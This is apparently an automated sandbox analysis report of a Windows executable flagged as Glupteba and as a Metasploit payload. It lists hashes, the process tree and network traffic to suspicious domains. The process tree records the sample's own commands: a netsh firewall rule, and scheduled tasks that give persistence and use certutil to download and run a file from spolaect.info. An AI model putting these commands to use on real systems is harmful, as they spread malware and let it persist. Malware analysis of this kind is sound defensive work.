Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    5s
  • max time network
    165s
  • platform
    windows7_x64
  • resource
    win7-20231215-en
  • resource tags

    arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
  • submitted
    31/12/2023, 03:26 UTC

General

  • Target

    2654d11f2d3ce974e432ad1c84bcd1f7.exe

  • Size

    4.5MB

  • MD5

    2654d11f2d3ce974e432ad1c84bcd1f7

  • SHA1

    053efdc46790dd1b49e93863df59c83c39342c8f

  • SHA256

    df52242510b70aa54d66b0626624066ece6f8bd5384aa4897778bddfae321c51

  • SHA512

    8b577ed49b7648d67ac7ad19cefdad52eb3665d42561e7b97034607ab1d0e7eb2d0fa22a3338717a2c19e12b9826c338e0f66fcdef3cc9ad6d105c95a0b00df7

  • SSDEEP

    98304:UvcNtBvoJc7I0r0fy0hqQRi69numaD09pJ6N5f1qlFBdWiBl5E1oz2tiuD:UkJtjr0fXRi65rwfCFTZteoz2B

Malware Config

Extracted

Family

metasploit

Version

windows/single_exec

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba payload 18 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Modifies Windows Firewall 1 TTPs 1 IoCs
  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • GoLang User-Agent 2 IoCs

    Uses default user-agent string defined by GoLang HTTP packages.

Processes

  • C:\Users\Admin\AppData\Local\Temp\2654d11f2d3ce974e432ad1c84bcd1f7.exe
    "C:\Users\Admin\AppData\Local\Temp\2654d11f2d3ce974e432ad1c84bcd1f7.exe"
    1⤵
      PID:1164
      • C:\Users\Admin\AppData\Local\Temp\2654d11f2d3ce974e432ad1c84bcd1f7.exe
        "C:\Users\Admin\AppData\Local\Temp\2654d11f2d3ce974e432ad1c84bcd1f7.exe"
        2⤵
          PID:2848
          • C:\Windows\system32\cmd.exe
            C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
            3⤵
              PID:2580
            • C:\Windows\rss\csrss.exe
              C:\Windows\rss\csrss.exe /51-51
              3⤵
                PID:2504
                • C:\Windows\system32\schtasks.exe
                  schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://spolaect.info/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
                  4⤵
                  • Creates scheduled task(s)
                  PID:2792
                • C:\Windows\system32\schtasks.exe
                  schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                  4⤵
                  • Creates scheduled task(s)
                  PID:368
                • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
                  "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
                  4⤵
                    PID:2356
            • C:\Windows\system32\makecab.exe
              "C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20240102022855.log C:\Windows\Logs\CBS\CbsPersist_20240102022855.cab
              1⤵
                PID:2404
              • C:\Windows\system32\netsh.exe
                netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
                1⤵
                • Modifies Windows Firewall
                PID:2636

              Network

              • flag-us
                DNS
                ninhaine.com
                Remote address:
                8.8.8.8:53
                Request
                ninhaine.com
                IN TXT
                Response
              • flag-us
                DNS
                2makestorage.com
                Remote address:
                8.8.8.8:53
                Request
                2makestorage.com
                IN TXT
                Response
              • flag-us
                DNS
                2makestorage.com
                Remote address:
                8.8.8.8:53
                Request
                2makestorage.com
                IN TXT
              • flag-us
                DNS
                2makestorage.com
                Remote address:
                8.8.8.8:53
                Request
                2makestorage.com
                IN TXT
              • flag-us
                DNS
                nisdably.com
                Remote address:
                8.8.8.8:53
                Request
                nisdably.com
                IN TXT
                Response
                nisdably.com
                IN TXT
                .v=spf1 include:_incspfcheck.mailspike.net ?all
              • flag-us
                DNS
                nisdably.com
                Remote address:
                8.8.8.8:53
                Request
                nisdably.com
                IN TXT
              • flag-us
                DNS
                7d2dca12-1ec5-4f75-a6e6-8d54ea77236e.ninhaine.com
                Remote address:
                8.8.8.8:53
                Request
                7d2dca12-1ec5-4f75-a6e6-8d54ea77236e.ninhaine.com
                IN TXT
                Response
              • flag-us
                DNS
                server2.ninhaine.com
                Remote address:
                8.8.8.8:53
                Request
                server2.ninhaine.com
                IN A
                Response
                server2.ninhaine.com
                IN A
                46.8.8.100
              • flag-us
                DNS
                server2.ninhaine.com
                Remote address:
                8.8.8.8:53
                Request
                server2.ninhaine.com
                IN A
              • flag-us
                DNS
                apps.identrust.com
                Remote address:
                8.8.8.8:53
                Request
                apps.identrust.com
                IN A
                Response
                apps.identrust.com
                IN CNAME
                identrust.edgesuite.net
                identrust.edgesuite.net
                IN CNAME
                a1952.dscq.akamai.net
                a1952.dscq.akamai.net
                IN A
                96.17.179.184
                a1952.dscq.akamai.net
                IN A
                96.17.179.205
              • flag-us
                DNS
                apps.identrust.com
                Remote address:
                8.8.8.8:53
                Request
                apps.identrust.com
                IN A
              • flag-us
                DNS
                apps.identrust.com
                Remote address:
                8.8.8.8:53
                Request
                apps.identrust.com
                IN A
                Response
                apps.identrust.com
                IN CNAME
                identrust.edgesuite.net
                identrust.edgesuite.net
                IN CNAME
                a1952.dscq.akamai.net
                a1952.dscq.akamai.net
                IN A
                96.17.179.184
                a1952.dscq.akamai.net
                IN A
                96.17.179.205
              • flag-us
                DNS
                apps.identrust.com
                Remote address:
                8.8.8.8:53
                Request
                apps.identrust.com
                IN A
              • flag-us
                DNS
                apps.identrust.com
                Remote address:
                8.8.8.8:53
                Request
                apps.identrust.com
                IN A
              • flag-us
                DNS
                msdl.microsoft.com
                Remote address:
                8.8.8.8:53
                Request
                msdl.microsoft.com
                IN A
                Response
                msdl.microsoft.com
                IN CNAME
                msdl.microsoft.akadns.net
                msdl.microsoft.akadns.net
                IN CNAME
                msdl-microsoft-com.a-0016.a-msedge.net
                msdl-microsoft-com.a-0016.a-msedge.net
                IN CNAME
                a-0016.a-msedge.net
                a-0016.a-msedge.net
                IN A
                204.79.197.219
              • flag-gb
                GET
                http://apps.identrust.com/roots/dstrootcax3.p7c
                Remote address:
                96.17.179.184:80
                Request
                GET /roots/dstrootcax3.p7c HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                User-Agent: Microsoft-CryptoAPI/6.1
                Host: apps.identrust.com
                Response
                HTTP/1.1 200 OK
                X-XSS-Protection: 1; mode=block
                X-Frame-Options: SAMEORIGIN
                X-Content-Type-Options: nosniff
                X-Robots-Tag: noindex
                Referrer-Policy: same-origin
                Last-Modified: Fri, 13 Oct 2023 16:28:31 GMT
                ETag: "37d-6079b8c0929c0"
                Accept-Ranges: bytes
                Content-Length: 893
                X-Content-Type-Options: nosniff
                X-Frame-Options: sameorigin
                Content-Type: application/pkcs7-mime
                Cache-Control: max-age=3600
                Expires: Tue, 02 Jan 2024 03:29:47 GMT
                Date: Tue, 02 Jan 2024 02:29:47 GMT
                Connection: keep-alive
              • flag-gb
                GET
                http://apps.identrust.com/roots/dstrootcax3.p7c
                Remote address:
                96.17.179.184:80
                Request
                GET /roots/dstrootcax3.p7c HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                User-Agent: Microsoft-CryptoAPI/6.1
                Host: apps.identrust.com
                Response
                HTTP/1.1 200 OK
                X-XSS-Protection: 1; mode=block
                X-Frame-Options: SAMEORIGIN
                X-Content-Type-Options: nosniff
                X-Robots-Tag: noindex
                Referrer-Policy: same-origin
                Last-Modified: Fri, 13 Oct 2023 16:28:31 GMT
                ETag: "37d-6079b8c0929c0"
                Accept-Ranges: bytes
                Content-Length: 893
                X-Content-Type-Options: nosniff
                X-Frame-Options: sameorigin
                Content-Type: application/pkcs7-mime
                Cache-Control: max-age=3600
                Expires: Tue, 02 Jan 2024 03:29:49 GMT
                Date: Tue, 02 Jan 2024 02:29:49 GMT
                Connection: keep-alive
              • flag-us
                DNS
                www.microsoft.com
                Remote address:
                8.8.8.8:53
                Request
                www.microsoft.com
                IN A
                Response
                www.microsoft.com
                IN CNAME
                www.microsoft.com-c-3.edgekey.net
                www.microsoft.com-c-3.edgekey.net
                IN CNAME
                www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net
                www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net
                IN CNAME
                e13678.dscb.akamaiedge.net
                e13678.dscb.akamaiedge.net
                IN A
                92.123.241.137
              • flag-us
                DNS
                ww82.ninhaine.com
                Remote address:
                8.8.8.8:53
                Request
                ww82.ninhaine.com
                IN A
                Response
                ww82.ninhaine.com
                IN CNAME
                63214.bodis.com
                63214.bodis.com
                IN A
                199.59.243.225
              • flag-us
                DNS
                ww82.ninhaine.com
                Remote address:
                8.8.8.8:53
                Request
                ww82.ninhaine.com
                IN A
              • flag-us
                DNS
                ww82.ninhaine.com
                Remote address:
                8.8.8.8:53
                Request
                ww82.ninhaine.com
                IN A
              • flag-us
                DNS
                ww82.ninhaine.com
                Remote address:
                8.8.8.8:53
                Request
                ww82.ninhaine.com
                IN A
              • flag-us
                GET
                http://ww82.ninhaine.com/
                Remote address:
                199.59.243.225:80
                Request
                GET / HTTP/1.1
                Host: ww82.ninhaine.com
                User-Agent: Go-http-client/1.1
                Content-Type: application/json; charset=UTF-8
                Accept-Encoding: gzip
                Response
                HTTP/1.1 200 OK
                date: Tue, 02 Jan 2024 02:29:56 GMT
                content-type: text/html; charset=utf-8
                content-length: 1021
                x-request-id: ec1b3501-b497-4488-97f4-079e9a224a28
                cache-control: no-store, max-age=0
                accept-ch: sec-ch-prefers-color-scheme
                critical-ch: sec-ch-prefers-color-scheme
                vary: sec-ch-prefers-color-scheme
                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Tt/J9oqHpuqXX6un3Cskdko3ntgD1EOja6YOeQ+8B1Hpbe2+JoOhWbyNcOz/GR92FxtaOj/IK4FrDZpNw9TExw==
                set-cookie: parking_session=ec1b3501-b497-4488-97f4-079e9a224a28; expires=Tue, 02 Jan 2024 02:44:56 GMT; path=/
              • flag-us
                GET
                http://ww82.ninhaine.com/
                Remote address:
                199.59.243.225:80
                Request
                GET / HTTP/1.1
                Host: ww82.ninhaine.com
                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36
                Accept-Encoding: gzip
                Response
                HTTP/1.1 200 OK
                date: Tue, 02 Jan 2024 02:29:56 GMT
                content-type: text/html; charset=utf-8
                content-length: 1021
                x-request-id: aea5f282-ebbf-4187-8753-3328666798f3
                cache-control: no-store, max-age=0
                accept-ch: sec-ch-prefers-color-scheme
                critical-ch: sec-ch-prefers-color-scheme
                vary: sec-ch-prefers-color-scheme
                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_PWYaEjx1WLab74ULRf6Jk7/LR73s9JiUTVCBBaovLQ9NfKj4K53i5rfcUyBtNPKTbRb0vLBnSDmDHwZzWPyBTA==
                set-cookie: parking_session=aea5f282-ebbf-4187-8753-3328666798f3; expires=Tue, 02 Jan 2024 02:44:56 GMT; path=/
              • flag-us
                GET
                http://ww82.ninhaine.com/
                Remote address:
                199.59.243.225:80
                Request
                GET / HTTP/1.1
                Host: ww82.ninhaine.com
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0
                Accept-Encoding: gzip
                Response
                HTTP/1.1 200 OK
                date: Tue, 02 Jan 2024 02:29:58 GMT
                content-type: text/html; charset=utf-8
                content-length: 1021
                x-request-id: 77140089-0927-465a-ac53-e3d498537c8d
                cache-control: no-store, max-age=0
                accept-ch: sec-ch-prefers-color-scheme
                critical-ch: sec-ch-prefers-color-scheme
                vary: sec-ch-prefers-color-scheme
                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_TeqaaDzaGkh++CO3S2rcAD+HiwCyxodbqjX0AgEelFwPnTwWZi+A6QzfdPwL/iC6OYYBvcgXGbWB/P0ZEczIcQ==
                set-cookie: parking_session=77140089-0927-465a-ac53-e3d498537c8d; expires=Tue, 02 Jan 2024 02:44:58 GMT; path=/
              • flag-us
                GET
                http://ww82.ninhaine.com/
                Remote address:
                199.59.243.225:80
                Request
                GET / HTTP/1.1
                Host: ww82.ninhaine.com
                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                Accept-Encoding: gzip
                Response
                HTTP/1.1 200 OK
                date: Tue, 02 Jan 2024 02:29:59 GMT
                content-type: text/html; charset=utf-8
                content-length: 1021
                x-request-id: 8b263e78-fd1c-4205-8c2c-64046dd374fd
                cache-control: no-store, max-age=0
                accept-ch: sec-ch-prefers-color-scheme
                critical-ch: sec-ch-prefers-color-scheme
                vary: sec-ch-prefers-color-scheme
                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Ppx9vxY7pmKhVFjR3+KyMhuE2D1SlyAf7U9Eg/jAKoTo2ogcFYqti0wYsjkE25HHFUyy7CruXr2Oi10jSAWC9g==
                set-cookie: parking_session=8b263e78-fd1c-4205-8c2c-64046dd374fd; expires=Tue, 02 Jan 2024 02:44:59 GMT; path=/
              • flag-us
                GET
                http://ww82.ninhaine.com/
                Remote address:
                199.59.243.225:80
                Request
                GET / HTTP/1.1
                Host: ww82.ninhaine.com
                User-Agent: Go-http-client/1.1
                Content-Type: application/x-www-form-urlencoded
                Accept-Encoding: gzip
                Response
                HTTP/1.1 200 OK
                date: Tue, 02 Jan 2024 02:30:01 GMT
                content-type: text/html; charset=utf-8
                content-length: 1021
                x-request-id: ed872d44-fa67-4b7a-a89f-e9e6d41e6dbe
                cache-control: no-store, max-age=0
                accept-ch: sec-ch-prefers-color-scheme
                critical-ch: sec-ch-prefers-color-scheme
                vary: sec-ch-prefers-color-scheme
                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Tt/J9oqHpuqXX6un3Cskdko3ntgD1EOja6YOeQ+8B1Hpbe2+JoOhWbyNcOz/GR92FxtaOj/IK4FrDZpNw9TExw==
                set-cookie: parking_session=ed872d44-fa67-4b7a-a89f-e9e6d41e6dbe; expires=Tue, 02 Jan 2024 02:45:01 GMT; path=/
              • flag-us
                DNS
                vsblobprodscussu5shard30.blob.core.windows.net
                Remote address:
                8.8.8.8:53
                Request
                vsblobprodscussu5shard30.blob.core.windows.net
                IN A
                Response
                vsblobprodscussu5shard30.blob.core.windows.net
                IN CNAME
                blob.sat09prdstrz08a.store.core.windows.net
                blob.sat09prdstrz08a.store.core.windows.net
                IN CNAME
                blob.SAT09PrdStrz08A.trafficmanager.net
                blob.SAT09PrdStrz08A.trafficmanager.net
                IN A
                20.150.79.68
                blob.SAT09PrdStrz08A.trafficmanager.net
                IN A
                20.150.70.36
                blob.SAT09PrdStrz08A.trafficmanager.net
                IN A
                20.150.38.228
              • 46.8.8.100:443
                server2.ninhaine.com
                tls
                1.1kB
                5.1kB
                12
                13
              • 46.8.8.100:443
                server2.ninhaine.com
                152 B
                3
              • 46.8.8.100:443
                server2.ninhaine.com
                tls
                1.9kB
                5.1kB
                13
                14
              • 46.8.8.100:443
                server2.ninhaine.com
                tls
                1.1kB
                4.9kB
                14
                9
              • 204.79.197.219:443
                msdl.microsoft.com
                tls
                1.9kB
                8.0kB
                15
                16
              • 96.17.179.184:80
                http://apps.identrust.com/roots/dstrootcax3.p7c
                http
                369 B
                1.6kB
                5
                4

                HTTP Request

                GET http://apps.identrust.com/roots/dstrootcax3.p7c

                HTTP Response

                200
              • 96.17.179.184:80
                http://apps.identrust.com/roots/dstrootcax3.p7c
                http
                727 B
                1.6kB
                7
                4

                HTTP Request

                GET http://apps.identrust.com/roots/dstrootcax3.p7c

                HTTP Response

                200
              • 46.8.8.100:443
                server2.ninhaine.com
                tls
                1.1kB
                5.0kB
                16
                10
              • 46.8.8.100:443
                server2.ninhaine.com
                tls
                1.3kB
                236 B
                10
                5
              • 46.8.8.100:443
                server2.ninhaine.com
                tls
                14.9kB
                8.7kB
                30
                27
              • 46.8.8.100:443
                server2.ninhaine.com
                tls
                836 B
                4.9kB
                10
                10
              • 199.59.243.225:80
                http://ww82.ninhaine.com/
                http
                565 B
                2.5kB
                9
                7

                HTTP Request

                GET http://ww82.ninhaine.com/

                HTTP Response

                200
              • 199.59.243.225:80
                http://ww82.ninhaine.com/
                http
                1.5kB
                8.9kB
                16
                17

                HTTP Request

                GET http://ww82.ninhaine.com/

                HTTP Response

                200

                HTTP Request

                GET http://ww82.ninhaine.com/

                HTTP Response

                200

                HTTP Request

                GET http://ww82.ninhaine.com/

                HTTP Response

                200

                HTTP Request

                GET http://ww82.ninhaine.com/

                HTTP Response

                200
              • 46.8.8.100:443
                server2.ninhaine.com
                tls
                4.8kB
                6.2kB
                31
                24
              • 20.150.79.68:443
                vsblobprodscussu5shard30.blob.core.windows.net
                tls
                21.1kB
                989.7kB
                427
                713
              • 8.8.8.8:53
                ninhaine.com
                dns
                58 B
                58 B
                1
                1

                DNS Request

                ninhaine.com

              • 8.8.8.8:53
                2makestorage.com
                dns
                186 B
                135 B
                3
                1

                DNS Request

                2makestorage.com

                DNS Request

                2makestorage.com

                DNS Request

                2makestorage.com

              • 8.8.8.8:53
                nisdably.com
                dns
                116 B
                117 B
                2
                1

                DNS Request

                nisdably.com

                DNS Request

                nisdably.com

              • 8.8.8.8:53
                7d2dca12-1ec5-4f75-a6e6-8d54ea77236e.ninhaine.com
                dns
                95 B
                95 B
                1
                1

                DNS Request

                7d2dca12-1ec5-4f75-a6e6-8d54ea77236e.ninhaine.com

              • 8.8.8.8:53
                server2.ninhaine.com
                dns
                132 B
                82 B
                2
                1

                DNS Request

                server2.ninhaine.com

                DNS Request

                server2.ninhaine.com

                DNS Response

                46.8.8.100

              • 8.8.8.8:53
                apps.identrust.com
                dns
                128 B
                165 B
                2
                1

                DNS Request

                apps.identrust.com

                DNS Request

                apps.identrust.com

                DNS Response

                96.17.179.184
                96.17.179.205

              • 8.8.8.8:53
                apps.identrust.com
                dns
                192 B
                165 B
                3
                1

                DNS Request

                apps.identrust.com

                DNS Request

                apps.identrust.com

                DNS Request

                apps.identrust.com

                DNS Response

                96.17.179.184
                96.17.179.205

              • 8.8.8.8:53
                msdl.microsoft.com
                dns
                64 B
                182 B
                1
                1

                DNS Request

                msdl.microsoft.com

                DNS Response

                204.79.197.219

              • 8.8.8.8:53
                www.microsoft.com
                dns
                63 B
                230 B
                1
                1

                DNS Request

                www.microsoft.com

                DNS Response

                92.123.241.137

              • 8.8.8.8:53
                ww82.ninhaine.com
                dns
                252 B
                105 B
                4
                1

                DNS Request

                ww82.ninhaine.com

                DNS Request

                ww82.ninhaine.com

                DNS Request

                ww82.ninhaine.com

                DNS Request

                ww82.ninhaine.com

                DNS Response

                199.59.243.225

              • 8.8.8.8:53
                vsblobprodscussu5shard30.blob.core.windows.net
                dns
                92 B
                231 B
                1
                1

                DNS Request

                vsblobprodscussu5shard30.blob.core.windows.net

                DNS Response

                20.150.79.68
                20.150.70.36
                20.150.38.228

              MITRE ATT&CK Enterprise v15

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • memory/1164-1-0x0000000000F20000-0x000000000135C000-memory.dmp

                Filesize

                4.2MB

              • memory/1164-2-0x0000000001360000-0x0000000001C86000-memory.dmp

                Filesize

                9.1MB

              • memory/1164-3-0x0000000000400000-0x0000000000D41000-memory.dmp

                Filesize

                9.3MB

              • memory/1164-0-0x0000000000F20000-0x000000000135C000-memory.dmp

                Filesize

                4.2MB

              • memory/1164-4-0x0000000000400000-0x0000000000D41000-memory.dmp

                Filesize

                9.3MB

              • memory/1164-6-0x0000000000F20000-0x000000000135C000-memory.dmp

                Filesize

                4.2MB

              • memory/1164-7-0x0000000001360000-0x0000000001C86000-memory.dmp

                Filesize

                9.1MB

              • memory/2356-45-0x0000000140000000-0x00000001405E8000-memory.dmp

                Filesize

                5.9MB

              • memory/2356-61-0x0000000140000000-0x00000001405E8000-memory.dmp

                Filesize

                5.9MB

              • memory/2504-246-0x0000000000400000-0x0000000000D41000-memory.dmp

                Filesize

                9.3MB

              • memory/2504-34-0x0000000000400000-0x0000000000D41000-memory.dmp

                Filesize

                9.3MB

              • memory/2504-20-0x0000000000F70000-0x00000000013AC000-memory.dmp

                Filesize

                4.2MB

              • memory/2504-329-0x0000000000400000-0x0000000000D41000-memory.dmp

                Filesize

                9.3MB

              • memory/2504-328-0x0000000000400000-0x0000000000D41000-memory.dmp

                Filesize

                9.3MB

              • memory/2504-22-0x0000000000F70000-0x00000000013AC000-memory.dmp

                Filesize

                4.2MB

              • memory/2504-24-0x0000000000400000-0x0000000000D41000-memory.dmp

                Filesize

                9.3MB

              • memory/2504-25-0x0000000000400000-0x0000000000D41000-memory.dmp

                Filesize

                9.3MB

              • memory/2504-26-0x0000000000F70000-0x00000000013AC000-memory.dmp

                Filesize

                4.2MB

              • memory/2504-27-0x0000000000400000-0x0000000000D41000-memory.dmp

                Filesize

                9.3MB

              • memory/2504-33-0x0000000000400000-0x0000000000D41000-memory.dmp

                Filesize

                9.3MB

              • memory/2504-327-0x0000000000400000-0x0000000000D41000-memory.dmp

                Filesize

                9.3MB

              • memory/2504-42-0x0000000000400000-0x0000000000D41000-memory.dmp

                Filesize

                9.3MB

              • memory/2504-326-0x0000000000400000-0x0000000000D41000-memory.dmp

                Filesize

                9.3MB

              • memory/2504-325-0x0000000000400000-0x0000000000D41000-memory.dmp

                Filesize

                9.3MB

              • memory/2504-324-0x0000000000400000-0x0000000000D41000-memory.dmp

                Filesize

                9.3MB

              • memory/2504-322-0x0000000000400000-0x0000000000D41000-memory.dmp

                Filesize

                9.3MB

              • memory/2504-323-0x0000000000400000-0x0000000000D41000-memory.dmp

                Filesize

                9.3MB

              • memory/2848-5-0x0000000000F70000-0x00000000013AC000-memory.dmp

                Filesize

                4.2MB

              • memory/2848-8-0x0000000000F70000-0x00000000013AC000-memory.dmp

                Filesize

                4.2MB

              • memory/2848-9-0x00000000013B0000-0x0000000001CD6000-memory.dmp

                Filesize

                9.1MB

              • memory/2848-10-0x0000000000400000-0x0000000000D41000-memory.dmp

                Filesize

                9.3MB

              • memory/2848-19-0x0000000000400000-0x0000000000D41000-memory.dmp

                Filesize

                9.3MB

              • memory/2848-21-0x0000000000F70000-0x00000000013AC000-memory.dmp

                Filesize

                4.2MB

              We care about your privacy.

              This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.